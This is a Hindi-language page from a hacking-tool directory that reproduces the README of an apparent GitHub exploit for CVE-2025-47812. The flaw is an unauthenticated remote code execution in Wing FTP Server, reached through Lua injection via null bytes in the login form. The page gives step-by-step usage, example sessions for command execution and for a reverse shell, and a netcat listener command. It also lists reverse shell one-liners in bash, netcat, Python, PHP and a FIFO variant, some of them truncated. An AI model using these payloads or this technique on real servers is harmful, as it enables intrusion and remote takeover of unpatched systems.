Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/blindma1den/cve-2025-47812
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Wing FTP सर्वर < 7.4.4 के लिए अनधिकृत रिमोट कोड निष्पादन एक्सप्लॉइट, सत्र फ़ाइलों में Lua इंजेक्शन के माध्यम से कमांड निष्पादन और रिवर्स शेल सक्षम करना।

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47812 - Wing FTP Server रिमोट कोड एक्जीक्यूशन (RCE)

===========================================================

लेखक: blindma1den

दिनांक: जुलाई 2025

एक्सप्लॉइट प्रकार: रिमोट कोड एक्जीक्यूशन (अप्रमाणित)

लक्ष्य: Wing FTP Server < 7.4.4

CVSS स्कोर: 10.0 (गंभीर)


विवरण

यह स्क्रिप्ट CVE-2025-47812 का शोषण करती है, जो Wing FTP Server के वेब इंटरफ़ेस में एक गंभीर कमजोरी है, जो रिमोट हमलावरों को प्रमाणीकरण के बिना मनमाने सिस्टम कमांड निष्पादित करने या रिवर्स शेल खोलने की अनुमति देती है।

यह दोष लॉगिन फॉर्म (/loginok.html) में नल बाइट्स (%00) के अनुचित हैंडलिंग के कारण उत्पन्न होता है। यह सत्र फ़ाइलों में Lua कोड इंजेक्शन की अनुमति देता है, जिसे बाद में /dir.html जैसे एंडपॉइंट तक पहुँचने पर मूल्यांकित किया जाता है।


स्रोत

NVD विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


विशेषताएँ

  • कमांड निष्पादन (जैसे, whoami, uname -a)
  • कई रिवर्स शेल पेलोड्स
  • UID सत्र कुकी स्वचालित रूप से निकालता है
  • स्वच्छ मॉड्यूलर Python 3 कार्यान्वयन

आवश्यकताएँ

  • Python 3.7+
  • requests मॉड्यूल

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests

उपयोग

स्क्रिप्ट चलाएँ:

root@kitploit:~
python3 wingftp_rce_exploit.py

आपसे निम्न के लिए पूछा जाएगा:

  • लक्ष्य URL (जैसे, http://127.0.0.1:5466)
  • उपयोगकर्ता नाम (डिफ़ॉल्ट: anonymous)
  • एक्सप्लॉइट मोड: [1] कमांड चलाएँ [2] रिवर्स शेल लॉन्च करें

उदाहरण

[1] कमांड चलाएँ:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] रिवर्स शेल:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

शेल ट्रिगर करने से पहले अपना लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

उपयोग किए गए पेलोड (रिवर्स शेल)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


अस्वीकरण

यह कोड केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है। अनधिकृत उपयोग अवैध और अनैतिक है।

अपने सिस्टम को तुरंत पैच करें। Wing FTP Server 7.4.4 इस कमजोरी को ठीक करता है।

हैप्पी हैकिंग!

टूल डाउनलोड करें